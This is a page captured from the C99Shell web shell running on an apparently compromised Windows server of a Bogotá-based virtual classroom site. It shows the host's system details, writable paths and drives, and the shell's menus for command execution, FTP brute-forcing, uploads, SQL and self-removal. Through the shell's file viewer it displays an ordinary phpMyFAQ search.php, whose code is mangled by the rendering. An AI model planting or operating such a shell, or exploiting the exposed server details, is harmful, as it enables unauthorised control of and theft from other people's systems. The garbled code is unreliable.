!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\aulavirtual\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     search.php (3.46 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
* $Id: search.php,v 1.3.2.12.2.15 2006/09/19 19:14:34 matteo Exp $
*
* The fulltext search page
*
* @author       Thorsten Rinne <thorsten@phpmyfaq.de>
* @author       Periklis Tsirakidis <tsirakidis@phpdevel.de>
* @since        2002-09-16
* @copyright    (c) 2001-2006 phpMyFAQ Team
*
* The contents of this file are subject to the Mozilla Public License
* Version 1.1 (the "License"); you may not use this file except in
* compliance with the License. You may obtain a copy of the License at
* http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS IS"
* basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
* License for the specific language governing rights and limitations
* under the License.
*/

if (!defined('IS_VALID_PHPMYFAQ')) {
    
header('Location: http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']));
    exit();
}

// HACK: (re)evaluate the Category object w/o passing the user language
//       so the result set of a Search will have the Category Path
//       for any of the multilanguage faq records and the Category list
//       on the left pane will not be affected
$tree = new Category();
$tree->transform(0);

$searchCategory = isset($_GET['searchcategory']) ? $db->escape_string(strip_tags($_GET['searchcategory'])) : '%';
if (isset(
$_GET['suchbegriff']) || isset($_GET['search'])) {
    if (isset(
$_GET['suchbegriff'])) {
        
$suchbegriff $db->escape_string(strip_tags($_GET['suchbegriff']));
    }
    if (isset(
$_GET['search'])) {
        
$suchbegriff $db->escape_string(strip_tags($_GET['search']));
    }
    
$printResult searchEngine($suchbegriff$searchCategory);
} else {
    
$printResult $PMF_LANG['help_search'];
    
$suchbegriff '';
    
$searchcategory '';
}
// Change a little bit the $searchCategory value;
$searchCategory = ('%' == $searchCategory) ? $searchCategory;

Tracking('fulltext_search'$suchbegriff);

$tree->buildTree();

$baseUrl getSystemScheme().$_SERVER["HTTP_HOST"].str_replace ('/index.php'''$_SERVER['PHP_SELF']);
$firefoxPluginTitle '';
$MSIEPluginTitle '';

if (
file_exists(dirname(__FILE__).'/'.$_SERVER['HTTP_HOST'].'.pmfsearch.src')) {
    
$firefoxPluginTitle '<p><a class="searchplugin" href="javascript:addEngine(\''.$baseUrl.'\', \''.$_SERVER['HTTP_HOST'].'.pmfsearch\', \'png\', \'Web\')">'.$PMF_LANG['ad_search_plugin_install'].'</a></p>';
}
if (
file_exists(dirname(__FILE__).'/'.$_SERVER['HTTP_HOST'].'.pmfsearch.xml')) {
    
$MSIEPluginTitle '<p><a class="searchplugin" href="#" onclick="window.external.AddSearchProvider(&quot;'.$baseUrl.'/'.$_SERVER['HTTP_HOST'].'.pmfsearch.xml&quot;);">'.$PMF_LANG['ad_msiesearch_plugin_install'].'</a></p>';
}

$tpl->processTemplate('writeContent', array(
                      
'msgSearch' => $PMF_LANG['msgSearch'],
                      
'searchString' => $suchbegriff,
                      
'selectCategories' => $PMF_LANG['msgSelectCategories'],
                      
'allCategories' => $PMF_LANG['msgAllCategories'],
                      
'printCategoryOptions' => $tree->printCategoryOptions($searchCategory),
                      
'writeSendAdress' => $_SERVER['PHP_SELF'].'?'.$sids.'action=search',
                      
'msgSearchWord' => $PMF_LANG['msgSearchWord'],
                      
'printResult' => $printResult,
                      
'msgFirefoxPluginTitle' => $firefoxPluginTitle,
                      
'msgMSIEPluginTitle' => $MSIEPluginTitle));

$tpl->includeTemplate('writeContent''index');

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--